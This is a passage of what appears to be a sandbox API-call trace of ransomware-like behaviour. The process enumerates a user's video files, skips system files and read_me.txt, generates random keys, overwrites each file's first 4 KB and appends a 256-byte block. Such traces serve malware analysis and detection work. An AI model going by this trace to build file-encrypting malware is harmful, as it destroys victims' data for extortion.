out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15647880, ftCreationTime.dwHighDateTime=0x1d4c6a0, ftLastAccessTime.dwLowDateTime=0xda50d6b0, ftLastAccessTime.dwHighDateTime=0x1d4d0a1, ftLastWriteTime.dwLowDateTime=0xda50d6b0, ftLastWriteTime.dwHighDateTime=0x1d4d0a1, nFileSizeHigh=0x0, nFileSizeLow=0x113d4, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="QZrSw.mkv", cAlternateFileName="")) returned 1 [0081.962] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn\\1XLsojndpt9tv\\QZrSw.mkv") returned 70 [0081.962] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn\\1XLsojndpt9tv\\QZrSw.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\sn6fn\\1xlsojndpt9tv\\qzrsw.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x894 [0081.962] StrStrW (lpFirst="qzrsw.mkv", lpSrch="read_me.txt") returned 0x0 [0081.962] StrStrW (lpFirst="qzrsw.mkv", lpSrch="autoexec.bat") returned 0x0 [0081.962] StrStrW (lpFirst="qzrsw.mkv", lpSrch="desktop.ini") returned 0x0 [0081.962] StrStrW (lpFirst="qzrsw.mkv", lpSrch="autorun.inf") returned 0x0 [0081.962] StrStrW (lpFirst="qzrsw.mkv", lpSrch="ntuser.dat") returned 0x0 [0081.962] StrStrW (lpFirst="qzrsw.mkv", lpSrch="iconcache.db") returned 0x0 [0081.962] StrStrW (lpFirst="qzrsw.mkv", lpSrch="bootsect.bak") returned 0x0 [0081.962] StrStrW (lpFirst="qzrsw.mkv", lpSrch="boot.ini") returned 0x0 [0081.962] StrStrW (lpFirst="qzrsw.mkv", lpSrch="ntuser.dat.log") returned 0x0 [0081.962] StrStrW (lpFirst="qzrsw.mkv", lpSrch="thumbs.db") returned 0x0 [0081.962] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 198 [0081.962] QueueUserWorkItem (Function=0x404e00, Context=0x894, Flags=0x0) returned 1 [0081.963] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24dc9560, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24dc9560, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24dc9560, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0081.963] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn\\1XLsojndpt9tv\\read_me.txt") returned 72 [0081.963] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn\\1XLsojndpt9tv\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\sn6fn\\1xlsojndpt9tv\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x890 [0081.963] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0081.963] CloseHandle (hObject=0x890) returned 1 [0081.963] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5e64d920, ftCreationTime.dwHighDateTime=0x1d4d1aa, ftLastAccessTime.dwLowDateTime=0xab2eb7d0, ftLastAccessTime.dwHighDateTime=0x1d4d443, ftLastWriteTime.dwLowDateTime=0xab2eb7d0, ftLastWriteTime.dwHighDateTime=0x1d4d443, nFileSizeHigh=0x0, nFileSizeLow=0xa345, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="TD3IoIpq2FumC-ki.avi", cAlternateFileName="TD3IOI~1.AVI")) returned 1 [0081.963] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn\\1XLsojndpt9tv\\TD3IoIpq2FumC-ki.avi") returned 81 [0081.963] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn\\1XLsojndpt9tv\\TD3IoIpq2FumC-ki.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\sn6fn\\1xlsojndpt9tv\\td3ioipq2fumc-ki.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x890 [0081.963] StrStrW (lpFirst="td3ioipq2fumc-ki.avi", lpSrch="read_me.txt") returned 0x0 [0081.963] StrStrW (lpFirst="td3ioipq2fumc-ki.avi", lpSrch="autoexec.bat") returned 0x0 [0081.963] StrStrW (lpFirst="td3ioipq2fumc-ki.avi", lpSrch="desktop.ini") returned 0x0 [0081.963] StrStrW (lpFirst="td3ioipq2fumc-ki.avi", lpSrch="autorun.inf") returned 0x0 [0081.963] StrStrW (lpFirst="td3ioipq2fumc-ki.avi", lpSrch="ntuser.dat") returned 0x0 [0081.963] StrStrW (lpFirst="td3ioipq2fumc-ki.avi", lpSrch="iconcache.db") returned 0x0 [0081.963] StrStrW (lpFirst="td3ioipq2fumc-ki.avi", lpSrch="bootsect.bak") returned 0x0 [0081.964] StrStrW (lpFirst="td3ioipq2fumc-ki.avi", lpSrch="boot.ini") returned 0x0 [0081.964] StrStrW (lpFirst="td3ioipq2fumc-ki.avi", lpSrch="ntuser.dat.log") returned 0x0 [0081.964] StrStrW (lpFirst="td3ioipq2fumc-ki.avi", lpSrch="thumbs.db") returned 0x0 [0081.964] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 199 [0081.964] QueueUserWorkItem (Function=0x404e00, Context=0x890, Flags=0x0) returned 1 [0081.964] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5902680, ftCreationTime.dwHighDateTime=0x1d4d0b8, ftLastAccessTime.dwLowDateTime=0xbc980ca0, ftLastAccessTime.dwHighDateTime=0x1d4c805, ftLastWriteTime.dwLowDateTime=0xbc980ca0, ftLastWriteTime.dwHighDateTime=0x1d4c805, nFileSizeHigh=0x0, nFileSizeLow=0x17be5, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="ywgd7W1qu5T.mp4", cAlternateFileName="YWGD7W~1.MP4")) returned 1 [0081.964] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn\\1XLsojndpt9tv\\ywgd7W1qu5T.mp4") returned 76 [0081.964] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn\\1XLsojndpt9tv\\ywgd7W1qu5T.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\sn6fn\\1xlsojndpt9tv\\ywgd7w1qu5t.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88c [0081.964] StrStrW (lpFirst="ywgd7w1qu5t.mp4", lpSrch="read_me.txt") returned 0x0 [0081.964] StrStrW (lpFirst="ywgd7w1qu5t.mp4", lpSrch="autoexec.bat") returned 0x0 [0081.964] StrStrW (lpFirst="ywgd7w1qu5t.mp4", lpSrch="desktop.ini") returned 0x0 [0081.964] StrStrW (lpFirst="ywgd7w1qu5t.mp4", lpSrch="autorun.inf") returned 0x0 [0081.964] StrStrW (lpFirst="ywgd7w1qu5t.mp4", lpSrch="ntuser.dat") returned 0x0 [0081.964] StrStrW (lpFirst="ywgd7w1qu5t.mp4", lpSrch="iconcache.db") returned 0x0 [0081.964] StrStrW (lpFirst="ywgd7w1qu5t.mp4", lpSrch="bootsect.bak") returned 0x0 [0081.964] StrStrW (lpFirst="ywgd7w1qu5t.mp4", lpSrch="boot.ini") returned 0x0 [0081.964] StrStrW (lpFirst="ywgd7w1qu5t.mp4", lpSrch="ntuser.dat.log") returned 0x0 [0081.965] StrStrW (lpFirst="ywgd7w1qu5t.mp4", lpSrch="thumbs.db") returned 0x0 [0081.965] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 200 [0081.965] QueueUserWorkItem (Function=0x404e00, Context=0x88c, Flags=0x0) returned 1 [0081.965] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5902680, ftCreationTime.dwHighDateTime=0x1d4d0b8, ftLastAccessTime.dwLowDateTime=0xbc980ca0, ftLastAccessTime.dwHighDateTime=0x1d4c805, ftLastWriteTime.dwLowDateTime=0xbc980ca0, ftLastWriteTime.dwHighDateTime=0x1d4c805, nFileSizeHigh=0x0, nFileSizeLow=0x17be5, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="ywgd7w1qu5t.mp4", cAlternateFileName="YWGD7W~1.MP4")) returned 0 [0081.965] FindClose (in: hFindFile=0x7cfe768 | out: hFindFile=0x7cfe768) returned 1 [0081.965] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Sn6Fn\\1XLsojndpt9tv\\read_me.txt") returned 72 [0081.965] GetProcessHeap () returned 0x4f10000 [0081.965] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b20098 | out: hHeap=0x4f10000) returned 1 [0081.965] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 91 [0081.965] GetProcessHeap () returned 0x4f10000 [0081.965] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8af0080 | out: hHeap=0x4f10000) returned 1 [0081.965] SetFilePointerEx (in: hFile=0x8a8, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.965] ReadFile (in: hFile=0x8a8, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0081.965] SetFilePointerEx (in: hFile=0x8a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.965] GetProcessHeap () returned 0x4f10000 [0081.965] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0081.965] GetProcessHeap () returned 0x4f10000 [0081.965] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0081.965] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0081.965] GetProcessHeap () returned 0x4f10000 [0081.965] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0081.965] ReadFile (in: hFile=0x8a8, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0082.013] SetFilePointerEx (in: hFile=0x8a8, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.013] WriteFile (in: hFile=0x8a8, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0082.013] GetProcessHeap () returned 0x4f10000 [0082.013] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0082.013] GetProcessHeap () returned 0x4f10000 [0082.013] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.013] GetProcessHeap () returned 0x4f10000 [0082.013] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0082.013] GetProcessHeap () returned 0x4f10000 [0082.013] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.013] GetProcessHeap () returned 0x4f10000 [0082.013] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0082.013] GetProcessHeap () returned 0x4f10000 [0082.013] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.013] GetProcessHeap () returned 0x4f10000 [0082.013] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.013] GetProcessHeap () returned 0x4f10000 [0082.013] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.013] GetProcessHeap () returned 0x4f10000 [0082.014] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.014] GetProcessHeap () returned 0x4f10000 [0082.014] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.014] GetProcessHeap () returned 0x4f10000 [0082.014] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.014] GetProcessHeap () returned 0x4f10000 [0082.014] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.014] GetProcessHeap () returned 0x4f10000 [0082.014] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.014] GetProcessHeap () returned 0x4f10000 [0082.014] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.014] GetProcessHeap () returned 0x4f10000 [0082.014] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.014] GetProcessHeap () returned 0x4f10000 [0082.014] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.014] GetProcessHeap () returned 0x4f10000 [0082.014] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.014] GetProcessHeap () returned 0x4f10000 [0082.014] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.014] GetProcessHeap () returned 0x4f10000 [0082.014] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.014] GetProcessHeap () returned 0x4f10000 [0082.014] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.015] GetProcessHeap () returned 0x4f10000 [0082.015] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.015] GetProcessHeap () returned 0x4f10000 [0082.015] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.015] GetProcessHeap () returned 0x4f10000 [0082.015] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.015] GetProcessHeap () returned 0x4f10000 [0082.015] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.015] GetProcessHeap () returned 0x4f10000 [0082.015] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.015] GetProcessHeap () returned 0x4f10000 [0082.015] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.015] GetProcessHeap () returned 0x4f10000 [0082.015] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.015] GetProcessHeap () returned 0x4f10000 [0082.015] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.015] GetProcessHeap () returned 0x4f10000 [0082.015] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.015] GetProcessHeap () returned 0x4f10000 [0082.015] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.015] GetProcessHeap () returned 0x4f10000 [0082.015] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.015] GetProcessHeap () returned 0x4f10000 [0082.015] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.015] GetProcessHeap () returned 0x4f10000 [0082.015] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.015] GetProcessHeap () returned 0x4f10000 [0082.015] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.015] GetProcessHeap () returned 0x4f10000 [0082.015] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.015] GetProcessHeap () returned 0x4f10000 [0082.015] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.015] GetProcessHeap () returned 0x4f10000 [0082.015] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.015] GetProcessHeap () returned 0x4f10000 [0082.015] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.015] GetProcessHeap () returned 0x4f10000 [0082.015] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0082.015] GetProcessHeap () returned 0x4f10000 [0082.015] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.016] GetProcessHeap () returned 0x4f10000 [0082.016] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0082.016] GetProcessHeap () returned 0x4f10000 [0082.016] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0082.016] GetProcessHeap () returned 0x4f10000 [0082.016] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0082.016] GetProcessHeap () returned 0x4f10000 [0082.016] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0082.016] GetProcessHeap () returned 0x4f10000 [0082.016] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0082.016] GetProcessHeap () returned 0x4f10000 [0082.016] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0082.016] GetProcessHeap () returned 0x4f10000 [0082.016] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.016] GetProcessHeap () returned 0x4f10000 [0082.016] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0082.016] GetProcessHeap () returned 0x4f10000 [0082.016] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.016] GetProcessHeap () returned 0x4f10000 [0082.016] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.016] GetProcessHeap () returned 0x4f10000 [0082.016] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.016] GetProcessHeap () returned 0x4f10000 [0082.016] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.016] GetProcessHeap () returned 0x4f10000 [0082.016] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.016] GetProcessHeap () returned 0x4f10000 [0082.016] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.016] GetProcessHeap () returned 0x4f10000 [0082.016] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.016] GetProcessHeap () returned 0x4f10000 [0082.016] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.017] GetProcessHeap () returned 0x4f10000 [0082.017] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.017] GetProcessHeap () returned 0x4f10000 [0082.017] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.017] GetProcessHeap () returned 0x4f10000 [0082.017] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.017] GetProcessHeap () returned 0x4f10000 [0082.017] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.017] GetProcessHeap () returned 0x4f10000 [0082.017] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.017] GetProcessHeap () returned 0x4f10000 [0082.017] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.017] GetProcessHeap () returned 0x4f10000 [0082.017] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.017] GetProcessHeap () returned 0x4f10000 [0082.017] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.017] GetProcessHeap () returned 0x4f10000 [0082.017] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.017] GetProcessHeap () returned 0x4f10000 [0082.017] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.017] GetProcessHeap () returned 0x4f10000 [0082.017] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.017] GetProcessHeap () returned 0x4f10000 [0082.017] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.017] GetProcessHeap () returned 0x4f10000 [0082.017] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.017] GetProcessHeap () returned 0x4f10000 [0082.017] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.017] GetProcessHeap () returned 0x4f10000 [0082.017] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.018] GetProcessHeap () returned 0x4f10000 [0082.018] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.018] GetProcessHeap () returned 0x4f10000 [0082.018] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0082.018] GetProcessHeap () returned 0x4f10000 [0082.018] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.018] GetProcessHeap () returned 0x4f10000 [0082.018] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0082.018] GetProcessHeap () returned 0x4f10000 [0082.018] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0082.018] GetProcessHeap () returned 0x4f10000 [0082.018] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0082.018] GetProcessHeap () returned 0x4f10000 [0082.018] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0082.018] SetFilePointerEx (in: hFile=0x8a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.018] WriteFile (in: hFile=0x8a8, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0082.018] WriteFile (in: hFile=0x8a8, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0082.018] GetProcessHeap () returned 0x4f10000 [0082.018] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0082.018] GetProcessHeap () returned 0x4f10000 [0082.018] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0082.018] GetProcessHeap () returned 0x4f10000 [0082.018] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0082.018] CloseHandle (hObject=0x8a8) returned 1 [0082.020] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 75 [0082.020] SetFilePointerEx (in: hFile=0x8ac, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.020] ReadFile (in: hFile=0x8ac, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0082.020] SetFilePointerEx (in: hFile=0x8ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.020] GetProcessHeap () returned 0x4f10000 [0082.020] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0082.020] GetProcessHeap () returned 0x4f10000 [0082.020] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0082.020] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0082.020] GetProcessHeap () returned 0x4f10000 [0082.020] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0082.020] ReadFile (in: hFile=0x8ac, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, 